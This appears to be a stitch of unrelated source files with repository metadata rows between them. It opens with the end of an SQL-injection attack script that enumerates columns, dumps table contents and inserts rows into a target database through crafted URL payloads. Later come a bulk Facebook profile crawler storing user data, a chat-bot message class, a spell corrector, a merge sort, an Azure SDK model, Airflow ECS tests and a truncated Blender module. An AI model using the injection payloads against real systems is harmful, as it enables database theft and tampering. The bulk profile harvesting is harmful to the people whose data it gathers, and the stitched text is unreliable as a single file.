site_URL = site+"+or+1=convert(int,(select+top+1+column_name+from+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+AND+column_name+NOT+IN"
site_URL = site_URL+"+(SELECT+TOP+darkc0de+column_name+FROM+"+arg_database+".information_schema.columns+where+table_name='"+arg_table+"'+ORDER+BY+column_name)+ORDER+BY+column_name))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if str(row_num) == "1":
print "[-] We do not seem to have premissions to view this table!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num+=1;row_num+=1
if mode == "--dump":
print "[+] Dumping data from DB: "+arg_database+", Table: "+arg_table+", Column: "+str(arg_columns)+"\n"
site_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]
site_URL = site_URL+"+NOT+in+(SELECT+TOP+darkc0de+"+arg_columns[0]+"+from+"+arg_database+".."+arg_table+")))--"
while 1:
gets+=1;proxy_num+=1
head_URL = site_URL.replace("darkc0de",str(top_num))
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
if row_num == 1:
print "[-] We seem to be having a problem!"
print "[-] Try again with the debug option on.. verify manually whats going on!"
break
break
the_juice = string.rstrip(the_juice,":")
print "["+str(row_num)+"]",the_juice
file.write("\n["+str(row_num)+"] "+the_juice)
top_num = int(top_num) + 1;row_num = int(row_num) + 1
if mode == "--insert":
print "[+] Inserting data into..."
print "\tDB: "+arg_database
print "\tTable: "+arg_table
print "\tColumn(s):\tData to be inserted:\n"
try:
for x in range(0, len(arg_columns)):
print "\t["+str(x)+"] "+arg_columns[x]+"\t"+arg_insert[x]
except:
pass
for column in arg_columns:
selected_col += column+","
selected_col = selected_col.rstrip(",")
for data in arg_insert:
inserted_data += "'"+data+"',"
inserted_data = inserted_data.rstrip(",")
gets+=1;proxy_num+=1
head_URL = site+";INSERT+INTO+"+arg_table+"("+selected_col+")+VALUES("+inserted_data+")--"
print "\n[!] Inserting Data....",
the_juice = GetTheShit(head_URL)
print "Done!"
print "\n[+] Was the data inserted?"
gets+=1;proxy_num+=1
head_URL = site+"+or+1=convert(int,(select+top+1+"+col_url+"+from+"+arg_database+".."+arg_table+"+where+"+arg_columns[0]+"='"+arg_insert[0]+"'))--"
the_juice = GetTheShit(head_URL)
if str(the_juice) == "None":
print "\n[-] Does not look like the data was inserted!"
else:
the_juice = the_juice.rstrip(":")
print "\t"+the_juice
print "[!] Data was successfully inserted!"
# Closing Info
print "\n[-] %s" % time.strftime("%X")
print "[-] Total URL Requests",gets
file.write("\n\n[-] [%s]" % time.strftime("%X"))
file.write("\n[-] Total URL Requests "+str(gets))
print "[-] Done\n"
file.write("\n[-] Done\n")
print "Don't forget to check", dbt,"\n"
file.close()
| gpl-2.0 | -3,683,697,330,514,333,000 | 44.843049 | 200 | 0.491588 | false | 3.48551 | false | false | false |
Petraea/jsonbot | jsb/drivers/sleek/message.py | 1 | 3117 | # jsb/drivers/sleek/message.py
#
#
""" jabber message definition .. types can be normal, chat, groupchat,
headline or error
"""
## jsb imports
from jsb.utils.exception import handle_exception
from jsb.utils.trace import whichmodule
from jsb.utils.generic import toenc, fromenc, jabberstrip
from jsb.utils.locking import lockdec
from jsb.lib.eventbase import EventBase
from jsb.lib.errors import BotNotSetInEvent
from jsb.lib.gozerevent import GozerEvent
## basic imports
import types
import time
import thread
import logging
import re
## locks
# Module-wide lock for reply handling; `replylocked` wraps it via
# jsb.utils.locking.lockdec (presumably a serializing decorator -- confirm).
replylock = thread.allocate_lock()
replylocked = lockdec(replylock)
## classes
class Message(GozerEvent):
    """ jabber message object. """
    # Wraps an XMPP <message/> stanza (types: normal/chat/groupchat/headline/
    # error, see module docstring) and exposes IRC-event-compatible attributes
    # so the rest of the bot can treat jabber messages like any other event.
    def __init__(self, nodedict={}):
        # NOTE(review): mutable default argument; shared between calls if it
        # were ever mutated -- left unchanged to preserve behavior.
        self.element = "message"
        self.jabber = True
        self.cmnd = "MESSAGE"
        self.cbtype = "MESSAGE"
        self.bottype = "xmpp"
        self.type = "normal"
        self.speed = 8
        GozerEvent.__init__(self, nodedict)
    def __copy__(self):
        return Message(self)
    def __deepcopy__(self, bla):
        # deep copy goes through copyin() so attributes are copied over
        # instead of aliasing this instance's node dict.
        m = Message()
        m.copyin(self)
        return m
    def parse(self, data, bot=None):
        """ set ircevent compat attributes. """
        # *data* is a sleekxmpp stanza-like mapping with 'from', 'type' and
        # 'body' entries -- TODO confirm against the sleek driver caller.
        logging.info("starting parse on %s" % str(data))
        self.bot = bot
        self.jidchange = False
        self.jid = str(data['from'])
        self.type = data['type']
        if not self.jid: logging.error("can't detect origin - %s" % data) ; return
        # a JID looks like room@server/resource; resource is optional
        try: self.resource = self.jid.split('/')[1]
        except IndexError: pass
        self.channel = self.jid.split('/')[0]
        self.origchannel = self.channel
        self.nick = self.resource
        self.ruserhost = self.jid
        self.userhost = self.jid
        self.stripped = self.jid.split('/')[0]
        self.printto = self.channel
        # missing 'body' raises AttributeError here; such events are flagged
        # nodispatch so no command handling is attempted on them
        try: self.txt = str(data['body']) ; self.nodispatch = False
        except AttributeError: self.txt = "" ; self.nodispatch = True
        self.time = time.time()
        logging.warn("message type is %s" % self.type)
        if self.type == 'groupchat':
            self.groupchat = True
            self.auth = self.userhost
        else:
            # private chat: auth on the bare JID and derive nick from it
            self.showall = True
            self.groupchat = False
            self.auth = self.stripped
            self.nick = self.jid.split("@")[0]
        self.msg = not self.groupchat
        self.fromm = self.jid
        self.makeargs()
        self.bind(self.bot)
        self.issleek = True
        return self
    def errorHandler(self):
        """ dispatch errors to their handlers. """
        # looks up a handle_<code> method for the stanza's error code and
        # calls it; unknown codes are only logged
        try:
            code = self.get('error').code
        except Exception, ex:
            handle_exception()
        try:
            method = getattr(self, "handle_%s" % code)
            if method:
                logging.error('sxmpp.core - dispatching error to handler %s' % str(method))
                method(self)
        except AttributeError, ex: logging.error('sxmpp.core - unhandled error %s' % code)
        except: handle_exception()
    def normalize(self, what):
        # delegate text normalisation to the owning bot
        return self.bot.normalize(what)
| mit | -797,068,788,213,894,300 | 28.130841 | 91 | 0.595124 | false | 3.79659 | false | false | false |
waggie/Facebook-Cr4wl3r | fb.py | 1 | 4917 | import json
import urllib2
#from threading import *
from pymongo import MongoClient
from xml.dom import minidom
from dicttoxml import dicttoxml
"""
t = Thread(target = conn_scan, args = (tgtHost, int(tgtPort)))
t.start()
"""
#screenLock = Semaphore(value = 1)
# Facebook Graph API endpoints; plain HTTP for anonymous lookups, HTTPS when
# an access token is sent.
baseUrl = "http://graph.facebook.com/"
secureBaseUrl = "https://graph.facebook.com/"
# Placeholder defaults; the real token and log flag are re-read from
# settings.xml inside each function below.
token = "asdfasdf"
log = 0
# Kick off a crawler
# Crawl a numeric range of Graph API profile ids anonymously, printing each
# name and optionally storing the JSON document in MongoDB.
# NOTE(review): the xmlFile parameter is unused -- settings are always read
# from the hard-coded 'settings.xml'; TODO confirm intent.
def crawl(xmlFile):
    xmldoc = minidom.parse('settings.xml')
    crawlSettings = xmldoc.getElementsByTagName('crawl')
    start = int(crawlSettings[0].attributes['start'].value)
    end = int(crawlSettings[1].attributes['end'].value)
    mongoSettings = xmldoc.getElementsByTagName('mongo')
    ipAddress = mongoSettings[0].attributes['ip'].value
    port = int(mongoSettings[1].attributes['port'].value)
    log = int(mongoSettings[2].attributes['log'].value)
    fbTokenSettings = xmldoc.getElementsByTagName('fb')
    token = fbTokenSettings[0].attributes['token'].value
    if log == 1:
        # only open a Mongo connection when logging is enabled
        client = MongoClient(ipAddress, port)
        db = client.facebookCrawler
        users = db.users
    userCount = 0
    print "Starting crawl...Start: %s, End: %s" % (start, end)
    for x in range(start, end):
        try:
            if x % 100 == 0:
                print "Working...%s\n" % (x)
            urlToVisit = baseUrl + str(x);
            data = json.load(urllib2.urlopen(urlToVisit))
            if log == 1:
                users.insert(data)
            userCount += 1
            print data['name']
        except:
            # NOTE(review): bare except silently skips ids that 404 or lack a
            # 'name' field -- also hides real errors (network, Mongo).
            pass
    print "\n" + str(userCount) + " Results Found!"
    print "Done crawling"
# Kick off a crawler with privileges
# Same as crawl() but sends the access token from settings.xml over HTTPS,
# so fields visible only to the authenticated app/user are returned.
# NOTE(review): near-duplicate of crawl(); only the URL construction differs.
def crawl_priv(xmlFile):
    xmldoc = minidom.parse('settings.xml')
    crawlSettings = xmldoc.getElementsByTagName('crawl')
    start = int(crawlSettings[0].attributes['start'].value)
    end = int(crawlSettings[1].attributes['end'].value)
    mongoSettings = xmldoc.getElementsByTagName('mongo')
    ipAddress = mongoSettings[0].attributes['ip'].value
    port = int(mongoSettings[1].attributes['port'].value)
    log = int(mongoSettings[2].attributes['log'].value)
    fbTokenSettings = xmldoc.getElementsByTagName('fb')
    token = fbTokenSettings[0].attributes['token'].value
    if log == 1:
        client = MongoClient(ipAddress, port)
        db = client.facebookCrawler
        users = db.users
    userCount = 0
    print "Starting crawl with privileges...Start: %s, End: %s" % (start, end)
    for x in range(start, end):
        try:
            if x % 100 == 0:
                print "Working...%s\n" % (x)
            urlToVisit = secureBaseUrl + str(x) + '?access_token=' + str(token)
            data = json.load(urllib2.urlopen(urlToVisit))
            if log == 1:
                users.insert(data)
            userCount += 1
            print data['name']
        except:
            # bare except: skips missing ids but also hides real failures
            pass
    print "\n" + str(userCount) + " Results Found!"
    print "Done crawling"
# Search for a user
# Search Graph API users by name and print an enumerated list of matches.
# NOTE(review): xmlFile is unused; settings come from 'settings.xml'.
def search(xmlFile, name):
    xmldoc = minidom.parse('settings.xml')
    crawlSettings = xmldoc.getElementsByTagName('fb')
    token = crawlSettings[0].attributes['token'].value
    # crude URL-encoding: only spaces are escaped
    name = name.replace(" ", "%20")
    url = secureBaseUrl + 'search?q=' + str(name) + '&type=user&access_token=' + str(token)
    count = 1
    try:
        data = json.load(urllib2.urlopen(url))
        print "Search returned %s results" % len(data['data'])
        for x in range(0, len(data['data'])):
            print count, '-', data['data'][x]['name']
            count = count + 1
    except:
        print "Error retrieving search results"
# See what metadata you can get from a User
# Print the Graph API "connections" available for a user and dump the whole
# metadata document to <username>_metadata.xml.
def meta(xmlFile, username):
    xmldoc = minidom.parse('settings.xml')
    crawlSettings = xmldoc.getElementsByTagName('fb')
    token = crawlSettings[0].attributes['token'].value
    url = secureBaseUrl + str(username) + '?metadata=1&access_token=' + str(token)
    count = 1
    try:
        data = json.load(urllib2.urlopen(url))
        for k, v in data['metadata']['connections'].items():
            print count, '-', k
            count = count + 1
        # serialise the full JSON response as XML next to the script
        xmldata = dicttoxml(data)
        with open(username + "_metadata.xml", 'w') as file_handle:
            file_handle.write(xmldata)
    except:
        print "Error retrieving metadata\n"
# Crawl a specific user
# Fetch a single user's public document and write it to <user>.xml.
def username(xmlFile, user):
    xmldoc = minidom.parse('settings.xml')
    crawlSettings = xmldoc.getElementsByTagName('fb')
    token = crawlSettings[0].attributes['token'].value
    url = secureBaseUrl + str(user) + '?access_token=' + str(token)
    count = 1   # NOTE(review): unused in this function
    try:
        data = json.load(urllib2.urlopen(url))
        xmldata = dicttoxml(data)
        with open(user + ".xml", 'w') as file_handle:
            file_handle.write(xmldata)
    except:
        print "Error retrieving user data\n"
| gpl-3.0 | -7,072,418,456,302,532,000 | 30.318471 | 91 | 0.605857 | false | 3.747713 | false | false | false |
adeshmukh/learntosolveit | languages/python/algorithm_spelling.py | 7 | 1031 | import re, collections
def words(text):
    """Extract every run of lowercase letters from *text* (case-folded)."""
    lowered = text.lower()
    return re.findall('[a-z]+', lowered)
def train(features):
    """Build a word-frequency model.

    Unseen words default to a count of 1 (add-one smoothing), which is why a
    defaultdict is returned rather than a plain dict.
    """
    counts = collections.defaultdict(lambda: 1)
    for feature in features:
        counts[feature] = counts[feature] + 1
    return counts
# Train the language model from the corpus. Use open() -- the Python-2-only
# file() builtin was removed in Python 3 -- and close the handle promptly
# instead of leaking it.
with open('big.txt') as corpus_file:
    NWORDS = train(words(corpus_file.read()))
alphabet = 'abcdefghijklmnopqrstuvwxyz'
def edits1(word):
    """Return the set of all strings one edit away from *word*.

    An edit is a single deletion, adjacent transposition, replacement, or
    insertion of a letter from ``alphabet``.
    """
    results = set()
    for i in range(len(word) + 1):
        head, tail = word[:i], word[i:]
        if tail:
            results.add(head + tail[1:])                        # delete
            for ch in alphabet:
                results.add(head + ch + tail[1:])               # replace
        if len(tail) > 1:
            results.add(head + tail[1] + tail[0] + tail[2:])    # transpose
        for ch in alphabet:
            results.add(head + ch + tail)                       # insert
    return results
def known_edits2(word):
    """Return the known (in NWORDS) words exactly two edits from *word*."""
    found = set()
    for once in edits1(word):
        for twice in edits1(once):
            if twice in NWORDS:
                found.add(twice)
    return found
def known(words):
    """Filter *words* down to those present in the NWORDS model.

    NOTE(review): the parameter shadows the module-level words() function.
    """
    return {w for w in words if w in NWORDS}
def correct(word):
    """Return the most probable spelling correction for *word*.

    Candidates are tried lazily in order of assumed likelihood: the word
    itself if known, then known words at edit distance 1, then 2; the word is
    returned unchanged when nothing is known.
    """
    candidates = known([word])
    if not candidates:
        candidates = known(edits1(word))
    if not candidates:
        candidates = known_edits2(word)
    if not candidates:
        candidates = [word]
    return max(candidates, key=NWORDS.get)
| bsd-3-clause | -3,281,640,367,960,298,000 | 33.366667 | 85 | 0.636275 | false | 2.971182 | false | false | false |
r39132/airflow | tests/contrib/operators/test_ecs_operator.py | 3 | 11098 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import sys
import unittest
from copy import deepcopy
from airflow import configuration
from airflow.exceptions import AirflowException
from airflow.contrib.operators.ecs_operator import ECSOperator
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
# Canned boto3 ECS run_task() response: a single PENDING task and an empty
# "failures" list, as returned for a successful task start.
RESPONSE_WITHOUT_FAILURES = {
    "failures": [],
    "tasks": [
        {
            "containers": [
                {
                    "containerArn":
                        "arn:aws:ecs:us-east-1:012345678910:container/e1ed7aac-d9b2-4315-8726-d2432bf11868",
                    "lastStatus": "PENDING",
                    "name": "wordpress",
                    "taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55"
                }
            ],
            "desiredStatus": "RUNNING",
            "lastStatus": "PENDING",
            "taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55",
            "taskDefinitionArn": "arn:aws:ecs:us-east-1:012345678910:task-definition/hello_world:11"
        }
    ]
}
class TestECSOperator(unittest.TestCase):
    """Unit tests for ECSOperator; the AWS hook and boto3 client are mocked,
    so no network access or credentials are needed."""
    # setUp patches AwsHook so constructing the operator never touches AWS.
    @mock.patch('airflow.contrib.operators.ecs_operator.AwsHook')
    def setUp(self, aws_hook_mock):
        configuration.load_test_config()
        self.aws_hook_mock = aws_hook_mock
        self.ecs = ECSOperator(
            task_id='task',
            task_definition='t',
            cluster='c',
            overrides={},
            aws_conn_id=None,
            region_name='eu-west-1',
            group='group',
            placement_constraints=[
                {
                    'expression': 'attribute:ecs.instance-type =~ t2.*',
                    'type': 'memberOf'
                }
            ],
            network_configuration={
                'awsvpcConfiguration': {
                    'securityGroups': ['sg-123abc']
                }
            }
        )
    def test_init(self):
        # constructor arguments must be stored verbatim on the operator
        self.assertEqual(self.ecs.region_name, 'eu-west-1')
        self.assertEqual(self.ecs.task_definition, 't')
        self.assertEqual(self.ecs.aws_conn_id, None)
        self.assertEqual(self.ecs.cluster, 'c')
        self.assertEqual(self.ecs.overrides, {})
        self.assertEqual(self.ecs.hook, self.aws_hook_mock.return_value)
        self.aws_hook_mock.assert_called_once_with(aws_conn_id=None)
    def test_template_fields_overrides(self):
        self.assertEqual(self.ecs.template_fields, ('overrides',))
    # execute() should call run_task with exactly the configured arguments
    # and then wait for / verify the task when no failures are reported.
    @mock.patch.object(ECSOperator, '_wait_for_task_ended')
    @mock.patch.object(ECSOperator, '_check_success_task')
    def test_execute_without_failures(self, check_mock, wait_mock):
        client_mock = self.aws_hook_mock.return_value.get_client_type.return_value
        client_mock.run_task.return_value = RESPONSE_WITHOUT_FAILURES
        self.ecs.execute(None)
        self.aws_hook_mock.return_value.get_client_type.assert_called_once_with('ecs',
                                                                                region_name='eu-west-1')
        client_mock.run_task.assert_called_once_with(
            cluster='c',
            launchType='EC2',
            overrides={},
            startedBy=mock.ANY,  # Can be 'airflow' or 'Airflow'
            taskDefinition='t',
            group='group',
            placementConstraints=[
                {
                    'expression': 'attribute:ecs.instance-type =~ t2.*',
                    'type': 'memberOf'
                }
            ],
            platformVersion='LATEST',
            networkConfiguration={
                'awsvpcConfiguration': {
                    'securityGroups': ['sg-123abc']
                }
            }
        )
        wait_mock.assert_called_once_with()
        check_mock.assert_called_once_with()
        self.assertEqual(self.ecs.arn,
                         'arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55')
    # a non-empty "failures" list in the run_task response must abort execute()
    def test_execute_with_failures(self):
        client_mock = self.aws_hook_mock.return_value.get_client_type.return_value
        resp_failures = deepcopy(RESPONSE_WITHOUT_FAILURES)
        resp_failures['failures'].append('dummy error')
        client_mock.run_task.return_value = resp_failures
        with self.assertRaises(AirflowException):
            self.ecs.execute(None)
        self.aws_hook_mock.return_value.get_client_type.assert_called_once_with('ecs',
                                                                                region_name='eu-west-1')
        client_mock.run_task.assert_called_once_with(
            cluster='c',
            launchType='EC2',
            overrides={},
            startedBy=mock.ANY,  # Can be 'airflow' or 'Airflow'
            taskDefinition='t',
            group='group',
            placementConstraints=[
                {
                    'expression': 'attribute:ecs.instance-type =~ t2.*',
                    'type': 'memberOf'
                }
            ],
            platformVersion='LATEST',
            networkConfiguration={
                'awsvpcConfiguration': {
                    'securityGroups': ['sg-123abc']
                }
            }
        )
    def test_wait_end_tasks(self):
        # waiting should use the 'tasks_stopped' waiter with unbounded retries
        client_mock = mock.Mock()
        self.ecs.arn = 'arn'
        self.ecs.client = client_mock
        self.ecs._wait_for_task_ended()
        client_mock.get_waiter.assert_called_once_with('tasks_stopped')
        client_mock.get_waiter.return_value.wait.assert_called_once_with(
            cluster='c', tasks=['arn'])
        self.assertEqual(
            sys.maxsize, client_mock.get_waiter.return_value.config.max_attempts)
    # a stopped container with a non-zero exit code is a failure
    def test_check_success_tasks_raises(self):
        client_mock = mock.Mock()
        self.ecs.arn = 'arn'
        self.ecs.client = client_mock
        client_mock.describe_tasks.return_value = {
            'tasks': [{
                'containers': [{
                    'name': 'foo',
                    'lastStatus': 'STOPPED',
                    'exitCode': 1
                }]
            }]
        }
        with self.assertRaises(Exception) as e:
            self.ecs._check_success_task()
        # Ordering of str(dict) is not guaranteed.
        self.assertIn("This task is not in success state ", str(e.exception))
        self.assertIn("'name': 'foo'", str(e.exception))
        self.assertIn("'lastStatus': 'STOPPED'", str(e.exception))
        self.assertIn("'exitCode': 1", str(e.exception))
        client_mock.describe_tasks.assert_called_once_with(
            cluster='c', tasks=['arn'])
    # a container still PENDING when checked is also an error
    def test_check_success_tasks_raises_pending(self):
        client_mock = mock.Mock()
        self.ecs.client = client_mock
        self.ecs.arn = 'arn'
        client_mock.describe_tasks.return_value = {
            'tasks': [{
                'containers': [{
                    'name': 'container-name',
                    'lastStatus': 'PENDING'
                }]
            }]
        }
        with self.assertRaises(Exception) as e:
            self.ecs._check_success_task()
        # Ordering of str(dict) is not guaranteed.
        self.assertIn("This task is still pending ", str(e.exception))
        self.assertIn("'name': 'container-name'", str(e.exception))
        self.assertIn("'lastStatus': 'PENDING'", str(e.exception))
        client_mock.describe_tasks.assert_called_once_with(
            cluster='c', tasks=['arn'])
    # NOTE(review): despite the name, this asserts _check_success_task does
    # NOT raise when one container has exitCode 1 but no lastStatus -- this
    # pins the current behaviour; confirm it is intended.
    def test_check_success_tasks_raises_multiple(self):
        client_mock = mock.Mock()
        self.ecs.client = client_mock
        self.ecs.arn = 'arn'
        client_mock.describe_tasks.return_value = {
            'tasks': [{
                'containers': [{
                    'name': 'foo',
                    'exitCode': 1
                }, {
                    'name': 'bar',
                    'lastStatus': 'STOPPED',
                    'exitCode': 0
                }]
            }]
        }
        self.ecs._check_success_task()
        client_mock.describe_tasks.assert_called_once_with(
            cluster='c', tasks=['arn'])
    # a task stopped because its EC2 host terminated must raise with a
    # descriptive message
    def test_host_terminated_raises(self):
        client_mock = mock.Mock()
        self.ecs.client = client_mock
        self.ecs.arn = 'arn'
        client_mock.describe_tasks.return_value = {
            'tasks': [{
                'stoppedReason': 'Host EC2 (instance i-1234567890abcdef) terminated.',
                "containers": [
                    {
                        "containerArn": "arn:aws:ecs:us-east-1:012345678910:container/e1ed7aac-d9b2-4315-8726-d2432bf11868",  # noqa: E501
                        "lastStatus": "RUNNING",
                        "name": "wordpress",
                        "taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55"  # noqa: E501
                    }
                ],
                "desiredStatus": "STOPPED",
                "lastStatus": "STOPPED",
                "taskArn": "arn:aws:ecs:us-east-1:012345678910:task/d8c67b3c-ac87-4ffe-a847-4785bc3a8b55",  # noqa: E501
                "taskDefinitionArn": "arn:aws:ecs:us-east-1:012345678910:task-definition/hello_world:11"  # noqa: E501
            }]
        }
        with self.assertRaises(AirflowException) as e:
            self.ecs._check_success_task()
        self.assertIn(
            "The task was stopped because the host instance terminated:",
            str(e.exception))
        self.assertIn("Host EC2 (", str(e.exception))
        self.assertIn(") terminated", str(e.exception))
        client_mock.describe_tasks.assert_called_once_with(
            cluster='c', tasks=['arn'])
    def test_check_success_task_not_raises(self):
        # happy path: STOPPED with exitCode 0 passes the success check
        client_mock = mock.Mock()
        self.ecs.client = client_mock
        self.ecs.arn = 'arn'
        client_mock.describe_tasks.return_value = {
            'tasks': [{
                'containers': [{
                    'name': 'container-name',
                    'lastStatus': 'STOPPED',
                    'exitCode': 0
                }]
            }]
        }
        self.ecs._check_success_task()
        client_mock.describe_tasks.assert_called_once_with(
            cluster='c', tasks=['arn'])
# Allow running this test module directly with `python test_ecs_operator.py`.
if __name__ == '__main__':
    unittest.main()
| apache-2.0 | -7,154,320,007,869,450,000 | 36.117057 | 138 | 0.545323 | false | 3.948061 | true | false | false |
zmarvel/playground | project3/merge.py | 1 | 1254 | def threeway_compare(x,y):
    # classic three-way comparison: -1 when x < y, 0 when equal, +1 otherwise
    if x < y:
        return -1
    elif x == y:
        return 0
    else:
        return 1
def merge(left, right, compare = threeway_compare):
    """Stably merge two already-sorted lists into one sorted list.

    *compare* is a three-way comparator returning <0, 0 or >0.
    """
    merged = []
    li, ri = 0, 0
    while li < len(left) and ri < len(right):
        # <= keeps the merge stable: on ties the left run is consumed first
        if compare(left[li], right[ri]) <= 0:
            merged.append(left[li])
            li += 1
        else:
            merged.append(right[ri])
            ri += 1
    # at most one of these has leftovers
    merged.extend(left[li:])
    merged.extend(right[ri:])
    return merged
def merge_sort(lst, compare = threeway_compare):
    """Return a sorted copy of *lst* via top-down merge sort.

    Lists of length <= 1 are returned as-is (not copied), matching the
    original behaviour.
    """
    if len(lst) <= 1:
        return lst
    mid = len(lst) // 2  # same value as int(len(lst) / 2) for non-negative lengths
    return merge(merge_sort(lst[:mid], compare),
                 merge_sort(lst[mid:], compare),
                 compare)
if __name__ == "__main__":
cmp = lambda x,y: -1 if x < y else (0 if x == y else 1)
assert merge_sort([], cmp) == []
assert merge_sort([1], cmp) == [1]
assert merge_sort([1,2], cmp) == [1,2]
assert merge_sort([2,1], cmp) == [1,2]
assert merge_sort([1,2,3]) == [1,2,3]
assert merge_sort([2,1,3], cmp) == [1,2,3]
assert merge_sort([3,2,1], cmp) == [1,2,3]
assert merge_sort([3,4,8,0,6,7,4,2,1,9,4,5]) == [0,1,2,3,4,4,4,5,6,7,8,9]
print('all tests passed!')
| mit | 8,966,986,141,526,539,000 | 28.857143 | 77 | 0.508772 | false | 2.811659 | false | false | false |
lmazuel/azure-sdk-for-python | azure-cognitiveservices-search-websearch/azure/cognitiveservices/search/websearch/models/videos.py | 2 | 3475 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .search_results_answer import SearchResultsAnswer
class Videos(SearchResultsAnswer):
    """Defines a video answer.

    Variables are only populated by the server, and will be ignored when
    sending a request.

    :param _type: Constant filled by server.
    :type _type: str
    :ivar id: A String identifier.
    :vartype id: str
    :ivar web_search_url: The URL To Bing's search result for this item.
    :vartype web_search_url: str
    :ivar follow_up_queries:
    :vartype follow_up_queries:
     list[~azure.cognitiveservices.search.websearch.models.Query]
    :ivar query_context:
    :vartype query_context:
     ~azure.cognitiveservices.search.websearch.models.QueryContext
    :ivar total_estimated_matches: The estimated number of webpages that are
     relevant to the query. Use this number along with the count and offset
     query parameters to page the results.
    :vartype total_estimated_matches: long
    :ivar is_family_friendly:
    :vartype is_family_friendly: bool
    :param value: A list of video objects that are relevant to the query.
    :type value:
     list[~azure.cognitiveservices.search.websearch.models.VideoObject]
    :ivar next_offset:
    :vartype next_offset: int
    :ivar query_expansions:
    :vartype query_expansions:
     list[~azure.cognitiveservices.search.websearch.models.Query]
    :ivar related_searches:
    :vartype related_searches:
     list[~azure.cognitiveservices.search.websearch.models.Query]
    """
    # NOTE: this model is generated by AutoRest (see file header); prefer
    # regenerating over hand-editing.
    # msrest validation rules: readonly fields are server-populated only.
    _validation = {
        '_type': {'required': True},
        'id': {'readonly': True},
        'web_search_url': {'readonly': True},
        'follow_up_queries': {'readonly': True},
        'query_context': {'readonly': True},
        'total_estimated_matches': {'readonly': True},
        'is_family_friendly': {'readonly': True},
        'value': {'required': True},
        'next_offset': {'readonly': True},
        'query_expansions': {'readonly': True},
        'related_searches': {'readonly': True},
    }
    # maps Python attribute names to wire (JSON) keys and msrest types
    _attribute_map = {
        '_type': {'key': '_type', 'type': 'str'},
        'id': {'key': 'id', 'type': 'str'},
        'web_search_url': {'key': 'webSearchUrl', 'type': 'str'},
        'follow_up_queries': {'key': 'followUpQueries', 'type': '[Query]'},
        'query_context': {'key': 'queryContext', 'type': 'QueryContext'},
        'total_estimated_matches': {'key': 'totalEstimatedMatches', 'type': 'long'},
        'is_family_friendly': {'key': 'isFamilyFriendly', 'type': 'bool'},
        'value': {'key': 'value', 'type': '[VideoObject]'},
        'next_offset': {'key': 'nextOffset', 'type': 'int'},
        'query_expansions': {'key': 'queryExpansions', 'type': '[Query]'},
        'related_searches': {'key': 'relatedSearches', 'type': '[Query]'},
    }
    def __init__(self, value):
        super(Videos, self).__init__()
        self.value = value
        # server-populated fields start out empty on the client
        self.next_offset = None
        self.query_expansions = None
        self.related_searches = None
        self._type = 'Videos'
| mit | -4,605,479,205,483,070,500 | 39.406977 | 84 | 0.608058 | false | 3.908886 | false | false | false |
harag-on-steam/se-blender | src/python/space_engineers/texture_files.py | 1 | 5737 | from collections import namedtuple
from enum import Enum
from itertools import groupby
import os
import re
import bpy
# Quick filename classifiers for legacy DirectX texture suffixes.
_RE_DIFFUSE = re.compile(r"_[dm]e\.dds$", re.IGNORECASE)
_RE_NORMAL = re.compile(r"_ns\.dds$", re.IGNORECASE)
# One named group per TextureType; the group names equal the TextureType
# enum values ('de', 'ng', 'ns', 'cm', 'add', 'alphamask') so a match can be
# mapped back to the enum via match.group(type.value).
_RE_TEXTURE_TYPE = re.compile(
    r"(?P<de>Diffuse_?(?P<me1>Masked_?)?(?:Emissiv(?:e|ity)?)?|DE|(?P<me2>ME))|"
    r"(?P<ng>Normal_?Gloss(?:iness)?|NG)|" # needs to be before "Normal" due to non-optional suffix "Gloss"
    r"(?P<ns>Normal_?(?:Specular(?:ity)?)?|NS)|"
    r"(?P<cm>(?:(?:Base_?)?Color|Albedo)_?Metal(?:ness|ic)?|CM)|"
    r"(?P<add>Add(?:_?Maps?|itional)?)|"
    r"(?P<alphamask>Alpha(?:Mask)?)",
    re.IGNORECASE
)
# Matches a whole node/object label, optionally followed by "2"/"Alt" (the
# 'alt' group), an optional "Tex(ture)" suffix and Blender's ".NNN" counter.
_RE_TEXTURE_LABEL = re.compile(
    r"^(?:" + _RE_TEXTURE_TYPE.pattern + r")_?(?:(?P<alt>2|Alt)_?)?(?:Tex(?:ture)?)?(?:\.\d+)?$",
    re.IGNORECASE)
# Splits a filename into basename, optional texture-type discriminator and
# extension; note this pattern has no 'alt' group.
_RE_TEXTURE_FILENAME = re.compile(
    # basename is non-greedy so that the texture-type discriminator can be optional
    r"^(?P<basename>.+?)_?(?:" + _RE_TEXTURE_TYPE.pattern + r")?\.(?P<extension>[^.]+)$",
    re.IGNORECASE)
class TextureType(Enum):
    """The known texture roles; each value doubles as the filename suffix and
    as the corresponding named group in _RE_TEXTURE_TYPE."""
    # NameInParameterXml = 'file-suffix'
    Diffuse = 'de'
    Normal = 'ns'
